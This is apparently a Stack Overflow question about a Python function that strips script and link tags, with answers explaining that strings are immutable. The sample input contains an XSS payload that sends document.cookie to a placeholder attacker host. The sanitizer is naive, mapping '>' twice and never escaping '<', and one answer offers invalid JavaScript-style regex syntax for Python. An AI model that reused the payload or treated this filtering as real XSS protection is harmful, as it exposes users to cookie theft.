pearbear
pearbear

Reputation: 1055

Why is function not working? Trying to replace words in string

I am trying to replace some key words in a string. Here is my function:

def clean_code(input):
    input.replace('<script>', " ")
    input.replace('</script>', " ")
    input.replace('<a href>', " ")
    input.replace('</a>', " ")
    input.replace('>', "&gt;")
    input.replace('>', "&lt;")
    return input

and here is my other code and the string:

string1 = "This blog is STUPID! >\n" \
"<script>document.location='http://some_attacker/cookie.cgi?"\
" +document.cookie </script>"


print '\nstring1 cleaned of code' 
print '------------------------'
print clean_code(string1)

My output is as follows, and I'm not sure why nothing has changed

string1 cleaned of code
------------------------
This blog is STUPID! >
<script>document.location='http://some_attacker/cookie.cgi? +document.cookie </script>

Upvotes: 2

Views: 8940

Answers (4)

Steven Rumbalski
Steven Rumbalski

Reputation: 45542

Strings are immutable in Python. input.replace('</a>', " ") does not alter input. You need to assign the result back to input.

But really you should use a parser like BeautifulSoup lxml.

Upvotes: 5

skunkfrukt
skunkfrukt

Reputation: 1570

String.replace returns a new string that is the result of the substitution, but does not change the original. To do that, you will have to assign the return value back to the variable, like so:

myString = myString.replace("foo", "bar")

Furthermore, input.replace('<a href>', " ") will only replace the exact substring "<a href>". To remove actual links, try input.replace(/<a\s[^>]*>/, " ").

Upvotes: 3

Jakob Bowyer
Jakob Bowyer

Reputation: 34698

.replace is not an in-place mutation

Try this

def clean_code(input):
    for tokens in [('<script>', " "),('</script>', " "),('<a href>', " "),
                ('</a>', " "),('>', "&gt;"),('>', "&lt;")]:
        input = input.replace(tokens[0], tokens[1])
    return input

Upvotes: 3

icecrime
icecrime

Reputation: 76755

Python strings are immutable:

input = input.replace('<script>', " ")
input = ...

See replace documentation:

Return a copy of string str with all occurrences of substring old replaced by new.

Upvotes: 8

Related Questions